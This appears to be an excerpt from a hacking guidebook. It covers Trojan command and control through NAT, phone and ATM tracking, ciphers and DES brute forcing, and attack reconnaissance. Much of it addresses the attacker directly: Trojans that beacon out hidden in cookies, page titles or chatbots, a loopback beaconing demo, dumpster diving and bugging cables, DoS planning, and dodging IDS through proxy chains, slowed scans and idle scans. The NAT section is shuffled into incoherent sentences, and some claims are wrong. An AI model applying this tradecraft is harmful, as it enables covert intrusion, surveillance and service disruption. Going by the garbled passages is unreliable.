NAT stands for Network Address Translation, and the NAT can be either a router or a firewall. The networks are growing every moment & there is a scarcity of address space in IPv4 (the xxx.xxx.xxx.xxx form of addresses). Every network which is connected to another network has a minimum of one gateway host. The gateway, as the name suggests, works as the entry point for the network and provides the connectivity among networks. The gateway has a minimum of two network cards installed on it & each has an IP address in the adjacent network to be connected; one of them is a part of the external network. The gateway can be considered as the embassy of a country: if anyone from a foreign country has to connect to that specific country, then he can only be connected through the embassy of that country. The same is true with the NAT: it acts as an embassy, and no one from the external networks can connect to its internal hosts but only to the NAT host (the gateway, as usual). The networks working behind such gateways may not be routed from the outer world. But remember the fact that the internal network hosts can be allowed to connect to the external world; in external networks, their addresses will get translated to their NAT host's IP address. This means that the external networks cannot connect to the network behind the NAT gateway. Let us analyze the stuff in the figure.
In the above figure, imagine that B_Host1 & B_Host2 are two systems present somewhere in the world in an external network such as the internet, while A_Host1 & A_Host2 lie in an unrouted network. Now the situation is that the external hosts (B_Hosts) cannot connect to the internal hosts (A_Hosts) by any means. The attacker is at any one of the B_Hosts, while the target victim is one of the A_Hosts. Remember, the NAT doesn't block the outbound traffic (the traffic from inside hosts to the external network), because anyone can access their e-mails, surf the web & do the e-shopping & other official stuff from the A_Hosts.

Now we need to observe the behavior of the NAT systems or firewalls. But how does NAT identify the inbound and outbound data packets? Well, the answer lies in the data packet itself: the firewall searches for the associated port numbers and the destination IP address. The ports are unsigned integer values from 0 to 65535 and are the tokens which must be present in the other peer for a successful connection. The port numbers are actually the file descriptors which must be unique for each and every service, and any data packet headed for a specific port number is sent to the service associated with that specific file descriptor. Actually, servers can use any port numbers, but the port numbers in the range 0 – 1024 are reserved for servers; most of the services use fixed port numbers in this range by default, and any server using port numbers below 1024 needs administrative privileges to do it. All the other port numbers, which are assigned by the client software by default to connect to a server, range from 1025 – 65535. Now the firewalls have a point to look for: the outbound data packets will have source port numbers greater than 1024, while the destination port number will mostly be
For secrecy the chat sessions 247 . The websites may contain the commands in the <HEAD> or <TITLE> tags or in hidden form fields. But there is another way out. Or a whole cookie of commands can be written to the system.below 1024 (may be larger as it depends upon the service). there are few services like DNS (Domain Name Service) for which a direct data packet is permitted by default for inbound traffic (Headed inside from external networks). There is another way mostly employed by the attackers to connect to a Trojan on an unrouted network. Consider the following scenario. Websites can be cached in victim host and websites also write the cookies. There is a feature called OLE in windows which enables any program to open any other software from it and interact with it.e. We can open the internet explorer with this feature and can connect to any web server in the world. there is no way to connect to internal unrouted network directly from outside world. In above case. Coming on to main point. This is the only way out. Well friends. We have to create hacks based on this fact. The attacker once forming a chat session with the Trojan chatbot user can interactively parse commands to it and can control the unrouted hosts. A chatbot is a program that does chatting with other users and pretends like a human. but internal hosts may connect to outside networks. Actually. the attacker has no way to connect to Trojan horse directly until he cracks the NAT system. i. the Trojan is programmed to login to a messenger server and act as a chatbot. any server using port numbers below 1024 needs administrative privileges to do it. the attacker has installed the Trojan horse on an unrouted host behind the NAT firewall and now attacker wants to connect to Trojan and send it the commands. The Trojan can be programmed to connect to attacker system automatically and send the desired data and get the required commands from attacking server. The attacking server may be a web server. 
In this case Trojan will react as a client and the attacker system will act as server. imagine if Trojan itself connects to the attacker! Yes.
248 . The programs & scripts can also surf the internet without even showing anything on the monitor screen. The firewalls do not block the socket clients by default and internet explorer is also a client program itself. Its nShowCmd argument (the last argument) decides whether to show a window in the desktop or to keep it executing in the memory only. The cookies are written into the current user’s home directory. The idea behind this concept is that the surfing is almost permitted without much worry on the behalf of firewall ACLs. The ShellExecute function launches the corresponding default loader for respective type of the files being provided to it as an argument. There is also one more way to receive the commands i. The information can also be sent to the remote attacker server by parsing it into URL as form’s GET method sends the information to remote server. how to get the commands? The remote attacker server can send the webpages back to the client. The programs can surf the internet using ShellExecute function. This facilitates to scramble the information from the firewalls or the human eye at much lower memory cost & without launching any other process into the memory which is more expensive from memory as well as the CPU usage perspective. The point is that it doesn’t make any sense for a firewall to detect whether a human or a program or script is surfing and impose the rules. by socket. there are several ways to get commands from remote attacker server system to anywhere in the world even behind the NAT. The commands can be sent by parsing them into webpage’s title or as the cookie.may be encrypted. Now.e. but it is difficult to read the contents of a webpage. take it in this way. We can send and receive the commands in more sophisticated and encrypted way. The simplest approach is done using the simple webpage access. We can provide it an URL to open instead of a file. But how to send commands to a remote control from external world? Well.
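The reverse-connection idea, with the inside host connecting out and carrying its report in a GET-style query string, can be sketched entirely on loopback. The host and field names are made up, and this illustrates only the mechanism of outbound beaconing, not any real implant:

```python
import socket
import threading
from urllib.parse import urlencode, parse_qs, urlparse

def reverse_beacon_demo():
    # "Attacker" side: an ordinary TCP listener standing in for a web server.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    seen = {}

    def server() -> None:
        conn, _ = srv.accept()
        request = conn.recv(4096).decode()
        path = request.split()[1]            # "GET /beacon?... HTTP/1.0"
        seen["params"] = parse_qs(urlparse(path).query)
        # commands could ride back inside a title tag, as the text describes
        conn.sendall(b"HTTP/1.0 200 OK\r\n\r\n<TITLE>noop</TITLE>")
        conn.close()

    t = threading.Thread(target=server)
    t.start()

    # "Inside" side: it connects OUT, so a NAT would permit it; the report
    # rides in the query string exactly like a form's GET method.
    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.connect(("127.0.0.1", port))
    src_port = cli.getsockname()[1]          # ephemeral source port
    query = urlencode({"host": "A_Host1", "user": "victim"})
    cli.sendall(f"GET /beacon?{query} HTTP/1.0\r\n\r\n".encode())
    reply = cli.recv(4096)
    cli.close()
    t.join()
    srv.close()
    return src_port, seen["params"], reply
```

Note the ephemeral source port the kernel assigns to the outbound connection: it is above 1024, which is exactly the pattern the firewall expects from ordinary clients.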
The Human Tracking Systems

The human mind wants to live in liberty, out of surveillance, and privacy is everyone's fundamental right in this universe. But this is becoming difficult in this era of ultra technology, when everyone wants to spy on others like our governments do. The highly rated and insecurity-favorite gadget is your mobile phone: until you have a phone associated with you, you don't feel secure anymore, yet with it you are deadly vulnerable. Before creating the hacks we must learn about the tracking systems and their way of working, so as to thwart their sophisticated surveillance; there is no question of creating hacks on the surveillance systems without that knowledge.

The fixed landline phone nodes can be tracked easily. Friends, if you are a programmer you can also make your own landline scanner: what you have to do is just catch up the phone directory, get a local map, and map each number to the locations in the map with the help of programming.

Triangular Scanning

But how are mobile users tracked? Most of us will immediately respond with a well-known answer, i.e., with the help of satellites. No! Absolutely not the satellites: mobile tracking is not done using satellites. Instead, a much cheaper and more effective solution is used, named triangular scanning or triangulation. In triangular scanning the mobile station Mss (the mobile phone or mobile device) is tracked using the signal intensities of three different towers (or base stations, Bss) of the service provider. The mobile users can be tracked up to a precision of 30 ft. A base station can transmit its signal only to a limited distance, and the signal strength decreases with the increase in distance: a high signal measure means near the base station, weak means far from the base station, and weakest means at the end point of the reach of the base station. Thus, this truth can be used to formulate the distance of the mobile station once the signal strength at that point is known; the exact distances can be calculated using the standard algorithms utilizing the signal strengths.
Every mobile station (phone) is programmed to transmit the signal strengths of every reachable base station (signaling tower) after a short time interval; we are not sure of the time exactly, but it is nearly 6-15 seconds. This helps them decide to hand over their channels to a different base station in case of a weak signal from the earlier base station, or during traveling. Thus, by calculating the distance with the help of the signal intensity of one base station (Bss1), we can locate the mobile station in a circular orbit: the mobile station can be anywhere on the perimeter of that circle. The uncertainty can be removed with more precision if we consider the signal strength of another base station (Bss2) along with the first one: we can draw another circle by calculating the distance from the second base station out of the signal strength reported by the mobile station. Now we have two circles, which means that we have effectively calculated the distances of the mobile station from two towers, and the mobile station must be at an intersection of these two circles. But there is a problem: as a lemma, the circles intersect each other at two distinct points, so the mobile station can be at either one of these two points, as is clear from the figure.
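Turning tower distances into a position is elementary geometry: subtracting the circle equations pairwise leaves a small linear system. A minimal sketch (tower coordinates and distances are made-up numbers; a real system derives the distances from the measured signal strengths):

```python
def trilaterate(p1, d1, p2, d2, p3, d3):
    """Solve for the point whose distances to three known towers are d1, d2, d3.

    Each tower gives a circle (x-xi)^2 + (y-yi)^2 = di^2; subtracting the
    equations pairwise cancels the quadratic terms and leaves a 2x2 linear
    system in x and y.
    """
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    a11, a12 = 2 * (x2 - x1), 2 * (y2 - y1)
    a21, a22 = 2 * (x3 - x1), 2 * (y3 - y1)
    b1 = d1**2 - d2**2 + x2**2 - x1**2 + y2**2 - y1**2
    b2 = d1**2 - d3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a11 * a22 - a12 * a21   # zero exactly when the towers are collinear
    if abs(det) < 1e-9:
        raise ValueError("towers are collinear; position stays ambiguous")
    x = (b1 * a22 - b2 * a12) / det
    y = (a11 * b2 - a21 * b1) / det
    return x, y
```

The determinant vanishes exactly when the towers lie on one line, which is why real deployments avoid placing three base stations in a straight line.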
Now we have shrunk the position of the mobile station to two identifiable distinct points, but we still cannot say at which one of the points the mobile station is located. For the sake of precision we need a third base station's signal (Bss3) to locate the mobile station exactly at a single point: the common point of intersection of the three circles will be the exact position of the mobile station (Mss), as in the figure. With triangular scanning the exact coordinates of the mobile station can be found with an uncertainty of 30 ft. So beware: from now on, you are being traced at every step. But there may be a flaw if the three base stations lie in a
straight line: then the third circle may also not clarify the position from two points to a single point. The figure will clear it more. That is why, actually, three towers or base stations are never placed in a straight line; another tower forming an angle with the two towers is always considered, so they always form a triangle of some sort, and that is why this scanning technique is called triangular scanning.

The ATM Tracing

Everyone uses the ATM machines nowadays; the banks and credit card companies use these nodes for the convenience of their customers. Therefore, the credit card transactions through such machines can be tracked with very high precision, at a fixed position, without the lag of a single second. The banks' financial accounting servers handle all these transactions along with the logging server (which may be on the same system or on a different server system). ATM machines are nothing more than dumb terminals which are connected directly with a highly efficient and fast mainframe server system, which may be as large as a big room or even larger (you must have studied about dumb terminals and mainframe computer systems in computer fundamentals). The dumb terminals are so called because they do not have local storage or processing systems (they may have a little, inefficient processing unit, but local storage is not allowed in ATM machines, as it may result in unexpected results).
The dumb terminals retrieve all their information instantly from a centralized computing unit, the mainframe system, containing the operating system and the database management systems, and these dumb terminals and mainframe servers are connected to each other through an ATM network (Asynchronous Transfer Mode) utilizing the ATM protocol. The ATM PDU (Protocol Data Unit), or cell, is 53 bytes with a 48-byte payload: a much smaller payload, and it travels faster than any other protocol's packets, since little latency is spent in assembling and sending the small cells compared to assembling a big packet while still waiting for more data to fit into it and only then sending the fat packet. In other protocols the data packet sizes vary depending upon the conditions, from a few bytes or hundreds of bytes up to kilobytes in size; also, the receiver end does not start processing the data packets until a certain amount of data is collected, which is in most cases a large amount, and that is why these protocols produce latency, which cannot be afforded at any cost in financial systems, where unexpected results may otherwise arise. That is why the ATM transactions are so fast.

Nowadays the companies are investing in distributed systems instead of a single mainframe system. A distributed system decreases the overall failure chances: suppose a single centralized mainframe system goes down, the whole business gets a setback, whereas if maybe 10% of the systems go down in a distributed environment, the overall effect is only a 10% downfall in the efficiency of the business system instead of 100%. Moreover, in a distributed environment the work balance is also maintained for better efficiency: the overloaded traffic is directed to the systems having less traffic at that instant.
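The fixed-size cell arithmetic is easy to verify:

```python
# ATM cell arithmetic: every cell is exactly 53 bytes, 5 of header and 48 of
# payload, so no latency is ever spent waiting to fill a large variable packet.
CELL_SIZE = 53
PAYLOAD = 48
HEADER = CELL_SIZE - PAYLOAD          # 5 bytes of addressing/control

efficiency = PAYLOAD / CELL_SIZE      # fraction of each cell that is user data

def cells_needed(nbytes: int) -> int:
    """Messages are chopped into 48-byte chunks; the last chunk is padded."""
    return -(-nbytes // PAYLOAD)      # ceiling division

print(HEADER)                # 5
print(round(efficiency, 4))  # 0.9057
print(cells_needed(100))     # 3
```

Roughly 90.6% of every cell carries user data, and the fixed size is what lets switches forward cells with predictable, tiny latency.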
Friends. the cryptanalysis attack on a cipher text using all possible key combinations altogether or the 255 . But implementing the knowledge of cryptography in computer security has really boosted the information security. Friends.The Data Security and Cryptanalysis Attacks In this section we are going to discus the encryption & decryption systems and the possible attacks on them.g. Friends can you tell us. the DNA processors can solve quite efficiently the “Salesman Problem” type computations that any other architecture can solve. both cipher machines were the nuisance for the allied intelligence services. the allied forces now knew every move of Germans and thus prepared for it. Whereas the Quantum processors are specially designed to carry out all kinds of computations simultaneously altogether e. keep in mind that the cryptography and computer security are two different things. The German ENIGMA and Japanese counterpart. The encryption algorithm is called cipher and the encrypted information is also called cipher text and the process of decryption is also termed as deciphering. so as to reveal the scrambled information is called the cryptanalysis and the attacker is called cryptanalyst. The DNA processors and quantum processors are developed in such a way to help finding the solutions of some problems in very less time than any other processor architecture. And the study of possible attacks on encryption and decryption systems. But once the algorithm of ENIGMA was cryptanalized. E. the picture of world war changed. Different processor architectures are developed for some specific kind of problems. The proof of this concept is the Second World War itself.g. why new processor architectures and highly efficient and fast supercomputers are manufactured by efficient countries? The answer is simple the country having faster computer system can attack & break the secret message transmission before hand and prepare for future situation. 
the study of encryption & decryption algorithms is called cryptography.
Well friends, in this section we'll take a look at some ancient ciphers, and then we will come on to the modern symmetric & asymmetric ciphers which are widely used in computer security. Let's go to a flashback and take a look at the history: the science of cryptography evolved several thousand years ago, when kings supplied their orders and secret information in a concealed way. A very suitable example is the Caesar cipher, the oldest known mono-substitution displacement cipher. Mono-substitution means a single character is substituted as ciphertext in place of each plaintext character, so in mono-substitution ciphers the ciphertext is of the same length as the plaintext. In the Caesar cipher of our example, every character is just displaced two steps ahead. Consider the following example ciphertext:

GOGTIGPEA FGENCTGF RTGRCTG JGCXA FGHGPUG CPF CVVCEM GPGOA VQOQTTQY

The English language has 26 alphabets; therefore, there are only 26 possible deciphered texts for the above ciphertext. The attack is simple: we replace the characters with each candidate displacement, beginning by mapping the first letter to A, and read the deciphered text so obtained to see if it makes any sense. Let's do it by taking only the first ciphered word, GOGTIGPEA:

1) AIANCAJYU  -- MAKES NO SENSE IN ENGLISH
2) BJBODBKZV  -- MAKES NO SENSE IN ENGLISH
3) CKCPECLAW  -- MAKES NO SENSE IN ENGLISH
4) DLDQFDMBX  -- MAKES NO SENSE IN ENGLISH
5) EMERGENCY  -- IT IS MAKING SENSE! WE GOT IT

We got the word EMERGENCY. Now displace the whole ciphertext the same way and we get:

EMERGENCY DECLARED PREPARE HEAVY DEFENSE AND ATTACK ENEMY TOMORROW

It was a simple displacement cipher. Now analyze the ciphertext and the deciphered text: we observe that the letters are displaced by two places ahead in the English alphabet. But in a general mono-substitution cipher there may be a random unique character chosen for each and every plaintext letter. In the case of such non-displacement mono-substitution ciphers, the cryptanalysis attack is carried out using the frequency of occurrence of each ciphertext letter, and then its frequency is matched with the frequency of the alphabets in normal day-to-day usage. Now answer this: which alphabet is used most of the time? Well, the letter 'e' is used the most in the whole of English and its runner-up is the letter 't'; these two characters have the highest probability of occurrence, with 'e' having a frequency of nearly 12% while 't' has slightly more than 9%. Now answer this: which word is used most in the English language? It is 'THE', and this word demystifies a lot of secrets about English. And which character duet (digram) is used in most of the words? Well, it is 'th', as you know better. This knowledge is quite precious in cryptanalysis. Let us utilize this knowledge in the field and try to break the following code.
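Both attacks described above, brute-forcing the 26 displacements and counting letter frequencies, fit in a few lines of Python. One assumption: the printed ciphertext's fourth word had a one-letter typo (JGCTA), since HEAVY enciphers to JGCXA under a two-step displacement, and the corrected word is used here:

```python
from collections import Counter

# Corrected ciphertext (JGCXA, not JGCTA, is HEAVY shifted two steps ahead).
CIPHERTEXT = "GOGTIGPEA FGENCTGF RTGRCTG JGCXA FGHGPUG CPF CVVCEM GPGOA VQOQTTQY"

def shift(text: str, k: int) -> str:
    """Displace every letter k steps ahead in the alphabet (mod 26), uppercase only."""
    out = []
    for ch in text:
        if ch.isalpha():
            out.append(chr((ord(ch) - ord("A") + k) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)

# Brute force: a displacement cipher has only 26 possible plaintexts.
candidates = [shift(CIPHERTEXT, -k) for k in range(26)]
plain = next(c for c in candidates if c.startswith("EMERGENCY"))
print(plain)  # EMERGENCY DECLARED PREPARE HEAVY DEFENSE AND ATTACK ENEMY TOMORROW

# Frequency analysis: 'E' dominates English text, exactly as the section notes.
freq = Counter(ch for ch in plain if ch.isalpha())
print(freq.most_common(1)[0][0])  # E
```

A real cryptanalysis tool would score each candidate automatically (for instance against a dictionary or letter-frequency table) instead of looking for a known word.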
Symmetric Ciphers

The symmetric ciphers scramble the plaintext using a secret key and a strong cipher algorithm. The security of these ciphers depends upon the secrecy of the key used. One of the most used symmetric ciphers is DES (Data Encryption Standard). DES was the standalone encryption algorithm used in earlier computer security and was once considered to be the strongest cipher. It is a block cipher: block ciphers take a chunk of data, pack it into a fixed-size block, and then do the ciphering and deciphering. The key size in DES is 56 bits: during the key generation process from the password, every parity bit (the 8th bit of a byte is called the parity bit) is removed and only 7 bits are used per byte, and if the password is short, padding is appended to complete the size of 56 bits. This leaves a 2^56 key space to search for the original key by brute forcing, which was considered computationally secure at the time of the evolution of DES: even using 10,000 decryptions per second, a brute-force attack could not yield the plaintext for hundreds of thousands of years. But nowadays, with the improvements in computing efficiency and new techniques of cryptanalysis attacks, DES is no more a challenge: computer hardware can take billions of computations simultaneously, and a machine testing around half a trillion keys per second could cover the whole key space in about 1 day & 11 hours.
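The brute-force arithmetic for the 56-bit key space is easy to check; the key-testing rates below are illustrative assumptions, not measurements of any particular machine:

```python
KEYSPACE = 2 ** 56                    # every possible 56-bit DES key
SECONDS_PER_YEAR = 365 * 24 * 3600

def years_to_search(keys_per_second: float) -> float:
    """Worst case: the entire key space must be tried."""
    return KEYSPACE / keys_per_second / SECONDS_PER_YEAR

# At 10,000 keys/s the search is hopeless (~2.3e5 years)...
print(round(years_to_search(1e4)))
# ...while roughly half a trillion keys/s covers the space in about 1.5 days.
print(round(years_to_search(5.6e11) * 365, 1))
```

On average only half the key space needs to be searched before the key turns up, so the expected times are half of these worst-case figures.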
The Attack

Start of Virtual War
The Reconnaissance

Reconnaissance is a military term which means gathering information about the enemy in all sorts of ways, technically and non-technically. Similarly, before an attack, the first step involves gathering even the smallest bits of information about the victim in every possible way. There are lots of ways to accomplish this task.
The techniques involved in Reconnaissance

The non-technical ways incorporate social engineering, dumpster diving, asking people, studying all the articles about the victim, etc. Lots of approaches are defined to do this job; in this discussion we will discuss a few techniques which will help you in gathering information not only about the computer systems but also about any kind of secret machines.

Dumpster diving involves checking the whole garbage of the victim corporation which is sent out of the corporation building for recycling. It involves the observation and study of the papers and other objects in the recycle bins of the corporation. A rough study of the garbage paperwork can help you visualize what is going on inside the victim corporation, and the garbage paperwork may sometimes even contain difficult user IDs & passwords. No one can suspect a hacker if he/she pretends to be a regular municipal corporation garbage collector, and the hackers can manage to read even damaged disks and destroyed diskettes. For security reasons the corporations must define a garbage destroying policy: no objects such as papers, old files, damaged hard drives, diskettes, etc. should go outside, by any means and at any cost, before being destroyed completely.

One more thing that is most helpful for hackers but is neglected by the corporations in most cases: the telephone cables going outside the corporation's building to an unguarded place. The hackers can install a recording and transmitting device on such cables. Also remember to guard the network cables effectively (try to use STP type cables). Hackers can fix a permanent tiny Bluetooth device inside the CPU cabinet unnoticeably, can install a Trojan horse in the computer systems, or can install a radio-wave transmitter inside the computer monitors capable of transmitting the video signals outside the corporation building; at the hackers' end they can reconstruct the signals so as to see clearly what is going on on the corporation's systems.
The Alien-Box Technique

In this technique the target is considered as an alien system. The target may be anything: a computer system, a corporation building, a voltage stabilizer, a submersible pump set, the spare parts of vehicles, strange computer systems or chips and ICs, or any sort of machine. The target systems are assigned three kinds of labels according to the knowledge of their working, which are:

1) Alien-System: any system about which we know nothing is termed an alien system. Every target is considered an alien system in the initial phase of the attack, when nothing is known about the target.
2) Foreigner-System: a system about which we have only partial knowledge of its internal working is termed a foreigner system.
3) Friend-System: a system about which we know everything (its advantages, disadvantages and vulnerabilities) is termed a friend system.

As the working of the target systems starts becoming clear to the hackers, they turn the label of an Alien-System into a Foreigner- or Friend-System. To know more about a target, we can study the manuals of the product, or study the notice fixed on the body of the system, which clearly defines the operating parameters of the system. Sometimes we cannot manage to get the manual of the target system, and then we have to emphasize finding out the target's brand name, model number and manufacturer. This information can be fed to the manufacturer's product support website and we can have even the entire circuit diagram of the target if we are lucky (in most cases we can get it without problem). We can feed the required arguments to the target system and then check its output: check out the working capabilities and the variation in the output of the system with respect to the variation in the input parameters.
An alien computer system can be turned into a foreigner system by effectively scanning it. The process is known as reconnaissance, or recon. The recon process is an information-gathering process in which even tiny tidbits of information about the target system are gathered by any means. In the recon phase the attacker can scan the remote systems using online scanners, proxy bouncing, etc. A foreigner-system has a few known properties that can be used to frame an effective attack against the box.

No system can work perfectly at all possible variations of its arguments. Like thermometers, which have a fixed working space on their scale, every system has fixed operating limits, and exceeding them results in wide deviation from normal behavior. Strange computer systems can be checked by varying the number of simultaneous requests and responses. Certainly there will be a deviation in their speed of response in providing the service, and the attacker can frame a graph of such deviations in latency and thus develop a technique to DOS attack (Denial of Service attack) the target system.

Moreover, any kind of system can handle only a finite number of requests, and the attacker can find out the maximum number of requests served by the alien server at a given time using statistical tests. By knowing this number, the attacker can eliminate all the legitimate client requests with a fake storm of requests; the server will look very busy but will actually be under attack, and it will be no more accessible to the rest of the world. Thus a severe DOS attack will be possible.

Another way: the algorithms used in systems can be figured out by testing the input and output types. Most vendors try to optimize their systems for size and speed, so they'll probably use the standardized algorithms, and the standard algorithms may have flaws; therefore the flaw may also be replicated in the target system.

Remember, every attacker has to be serious about his own anonymity and security, and in today's world attackers employ much more sophisticated approaches. Consider we have to scan a target system; then the process followed will be:

Attacker → (using encrypted link) → a system somewhere in another country → (using HTTPS) → an anonymous proxy server like www.anonymizer.ru → (using HTTPS) → online port scanner → target system.

Once the attacker has scanned the target system and has gathered important information about it, he can consider it a foreigner-system. The attacker then launches the attack, and if the victim of the attack is brought under the attacker's control, the victim can be termed a Friend-system.
Target Scanning

Once the attacker identifies the victim system, he can launch a target scanning attack. In this phase of the attack, the attacker gathers information about the services provided by the victim system. The attacker should check out the vulnerable services first to save time. We can use the NMAP utility on Linux systems. NMAP uses stealth techniques to scan the hosts, leaving no or very few traces of your activity; moreover, using the stealth scan of NMAP it becomes hard to trace back the attacker. But remember to bounce through other systems between the attacking host and the NMAP host and then scan the target systems.

Note: The recon phase is a very noisy phase of the attack and can invoke the IDS (Intrusion Detection System) and IPS (Intrusion Prevention System), so the target system's administrator can be alerted. Actually, scanning generates a huge amount of network traffic, and a familiar signature of the scanning phase can be determined by careful surgery of the traffic, observing the flags and the port numbers incrementing or decrementing continuously. This problem can be overcome by making the process much slower: attackers must slow down the packet-sending process to within 9 or 10 packets per day to the target systems or networks, or even fewer. The port numbers should also be randomized effectively.

But remember that the easy backdoors may be honeypots. A honeypot is a dedicated system or network containing a simulation of corporate systems or networks, used to study and observe the hackers' activities, which helps in designing effective techniques to thwart such attacks.
Remember to use encrypted channels as much as you can. We can use the SSH service, which provides a shell with an encrypted connection to a remote Linux system. Linux administrators use the SSH service to administer Linux systems remotely and securely, thwarting the sniffers' activity. The same shell can be used to attack remote systems without much trouble, as the data gets encrypted on these systems.

The Idle Scanning
The scanning phase is the most prone to be caught by IDS or IPS systems and logging servers, and most scanning software does not give us full control over its working. Remember, if the target administrator gets suspicious, he may take some extra precautions, making the process tougher. The idle scanning is the safest method: there is almost no chance of being caught, and it provides full control over the scanning phase.

In idle scanning, the first job is to look for an idle remote host somewhere in the world connected to the Internet. Idle means sending and receiving no traffic at that time, but still connected to the Internet. Every data packet is given a unique ID called the IPID. The IPID increments in steps of either 1 or 254 (depending upon the OS; for Win95 it is 1 and for Win2000 it is 254) with every packet sent. Whether the host is idle can be checked by sending a packet to the idle host and analyzing the IPID of the received data packet.

We then send a spoofed SYN packet to the remote target host on the desired port; the spoofed source address will be that of the idle host. If the remote host is serving on that port, it will respond with a SYN/ACK packet to the idle host. But as the idle host did not start this connection at all and has no knowledge of what is going on, it will respond with a RST packet, and its IPID will change by one step. If the remote target system does not listen on that port, it will respond with a RST packet to the idle host; this does not require sending any response from the idle host, so its IPID will remain constant. Either way, the result can be checked by again sending a data packet to the idle host and examining the IPID in the returned packet: for a closed port the IPID will have changed by one only (for the packet sent to the attacker's system); for an open port it will have incremented by two steps, one for the RST packet sent to the target system and one for the packet received on the attacking system.

If the idle host is not fully idle, or there is mild traffic on the idle host, then we can send a fixed number of data packets, say n = 10 or 15, to the target system and observe the change in the IPID of the idle host. A large difference in IPID (n or a little more than n) will show that the port is open, and none for a closed port. But remember, even 10 data packets are large enough to be caught by a remote firewall or IDS system and raise alarms, so avoid it. This process is the most secure method: if the idle system does not log single packets (mostly not done by default, to keep logs compact), then the attacker can never be tracked and can scan any target host in the world without being caught.
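The IPID arithmetic described above can be sketched as a small simulation. This is an illustrative model only: no packets are sent, and the starting IPID, the step of 1, and the host object are assumptions made for the example, not output from a real scan.

```python
# Simulation of the idle-scan IPID inference described above.
# We model an idle "zombie" host whose IPID advances by 1 for every
# packet it transmits (as on stacks where the step is 1).

class IdleHost:
    def __init__(self, ipid=1000):
        self.ipid = ipid

    def send_packet(self):
        """Idle host transmits one packet; its IPID advances by one step."""
        self.ipid += 1
        return self.ipid

def probe_ipid(idle):
    """Attacker pings the idle host and reads the IPID of the reply."""
    return idle.send_packet()

def spoofed_syn_probe(idle, target_port_open):
    """Spoofed SYN (source address = idle host) hits the target.

    Open port  : target sends SYN/ACK to idle host -> idle host answers RST
                 (one extra transmitted packet, IPID advances once more).
    Closed port: target sends RST to idle host -> idle host stays silent.
    """
    if target_port_open:
        idle.send_packet()   # the RST the idle host sends back to the target

def idle_scan(idle, target_port_open):
    before = probe_ipid(idle)            # this probe costs one IPID step itself
    spoofed_syn_probe(idle, target_port_open)
    after = probe_ipid(idle)             # this probe costs one IPID step itself
    delta = after - before
    # delta == 2 -> open  (RST to target + reply to us)
    # delta == 1 -> closed (only the reply to us)
    return "open" if delta == 2 else "closed"

print(idle_scan(IdleHost(), target_port_open=True))    # open
print(idle_scan(IdleHost(), target_port_open=False))   # closed
```

The simulation makes clear why the attacker's own probes must be subtracted out: each check of the zombie's IPID consumes one step of its own.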
The Target Profile Construction

This phase helps us visualize the target organization and its system setup; it is similar to the software-design phase. In this phase the attacker creates a visualization of the target and its internal setup in his mind by processing the information gathered in the recon phase. On the defending side, the system administrators use all methods to mangle the information leaking about their system setup (the system includes the network, computers, other machinery and the whole work setup of the target). This phase depends vastly upon the guesses of the attacker. It is used to create an internal architectural diagram of the whole target system. The visual diagram so created uses every single bit of information: building design, network design, computer systems used, working hours, the different IP addresses assigned to the organization, the domain names assigned to the target, etc. There are a few terms which may be encountered during this phase:

DMZ: Demilitarized Zone. It is a network placed between two other networks, one of which is an untrusted network like the Internet and the other the internal network. The DMZ is the no-man's-land of networks. It is placed in such a way that its resources are available to both networks, and it acts as the first line of defense: the attacker has to compromise the DMZ first before getting inside the internal network. Between the DMZ and the internal network a firewall is placed, which protects the internal network by filtering the traffic passed through the DMZ.

Honey Pot: Honey pots are computer systems or networks placed in the DMZ which seem to be the original internal systems or networks, advertising themselves as holding precious information or as being less immune to attacks. Honey pots are used to engage the attackers and study their way of attack, so as to develop a strategy against
such attacks. It is very difficult for attackers to identify the honey pots among original systems. But attackers use a simple guessing strategy: if a very high-profile and financially strong target seems to have a very weak network setup, seems to hold some precious information, runs vulnerable services with very poor protection, or has a backdoor already installed, then it may be a honey pot; leave it immediately and try some other point on the target network.
E-mail Bouncing

This technique is used to look inside the network and visualize a part of the network architecture. It applies if the mail server of the target is situated inside the target network. An e-mail addressed to a non-existent user is sent, and the attacker waits for the bounced-back e-mail. The bounced e-mail contains all the juicy information in its headers. The e-mail headers contain the information on the path followed and the address of the originating server; the path information contains the IP addresses of each system and router encountered during the transmission of the e-mail. Thus we get information about the internal network and the gateways to the target network. For security reasons, attackers do not use their own e-mail ID, which may point back to them. The e-mail headers can be examined in Outlook Express or any e-mail agent.
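The header inspection described above can be automated with a short script. The bounced message below is a fabricated example (the hostnames and addresses are invented), parsed with Python's standard email module; the Received: headers list the hops, outermost first.

```python
# Parse the Received: headers of a (fabricated) bounced e-mail to list the
# hops the message passed through on its way out of the target network.
from email import message_from_string

BOUNCE = """\
Received: from gw.example-target.net (gw.example-target.net [203.0.113.1])
	by mx.attacker-mailbox.example; Tue, 23 Oct 2007 19:29:33 +0900
Received: from mail1.internal.example-target.net ([10.0.0.25])
	by gw.example-target.net; Tue, 23 Oct 2007 19:29:31 +0900
From: MAILER-DAEMON@example-target.net
Subject: Undelivered Mail Returned to Sender

The user you tried to reach does not exist.
"""

msg = message_from_string(BOUNCE)
hops = msg.get_all("Received")
for i, hop in enumerate(hops, 1):
    # The "from ..." clause names the handing-off server; private
    # 10.x.x.x addresses reveal machines sitting behind the gateway.
    first_line = hop.split("\n")[0].strip()
    print(f"hop {i}: {first_line}")
```

Here the inner Received: header exposes an internal mail server and its private address, exactly the kind of detail the bounced e-mail leaks.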
Tracing the Route

The route to the target host is the path followed by the data packets to reach the target system. The route consists of several hops (the routers or other computers between the target and the attacking system). Routes are of two types: static and dynamic. A static route is a permanent entry added to the routing table, while dynamic routes are prone to change depending upon the network conditions. The route between the attacker's system and the target network may be of a dynamic nature. The routing table can be checked on Windows systems with the route print command or the netstat -r command, as:
C:\Documents and Settings\vinnu>netstat -r

Route Table
=========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x2 ...00 13 20 2a bb 02 ...... Intel(R)
=========================================================================
Persistent Routes:
  None
If an attacker somehow adds a persistent (static) route entry to the routing table, then he can sniff or hijack all the traffic outbound from that system. False entries in the routing table may bring down the whole network. A persistent route can be added by using the route ADD command. Coming back to the main discussion, the route information can be obtained by using the Tracert utility on Windows systems or the Traceroute utility on Linux systems.
